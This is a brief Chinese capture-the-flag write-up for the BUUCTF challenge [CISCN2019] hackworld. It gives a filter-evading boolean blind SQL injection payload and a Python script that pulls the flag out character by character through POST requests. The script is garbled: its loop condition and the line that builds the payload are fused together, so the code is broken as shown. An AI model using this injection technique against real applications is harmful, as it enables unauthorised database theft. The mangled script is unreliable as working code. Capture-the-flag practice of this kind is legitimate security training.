buuctf [CISCN2019] hackworld

过滤了很多sql字符，最终发现可以盲注，跟极客大挑战的fianlsql注入一样，这边告诉你表名和列名了
直接输入语句

1^(ascii(substr((select(flag)from(flag)),1,1))>1)^1

盲注手去敲太费时间，结合finalsql的经验，写脚本，注意这是post请求

奉上卑微脚本(看到大哥写的脚本太狠了）

import requests
import time

url = "http://f0c8caf0-fc27-454e-83bc-a557d1891b94.node3.buuoj.cn/index.php"
temp = {"id" : ""}
flag = ""
for i in range(1,1000):
    time.sleep(0.06)
    low = 32
    high =128
    mid = (low+high)//2
    while(low%d)^1" %(i,mid)
        r = requests.post(url,data=temp)
        print(low,high,mid,":")
        if "Hello" in r.text:
            low = mid+1
        else:
            high = mid
        mid =(low+high)//2
    if(mid ==32 or mid ==127):
        break
    flag +=chr(mid)
    print(flag)


print("flag=" ,flag)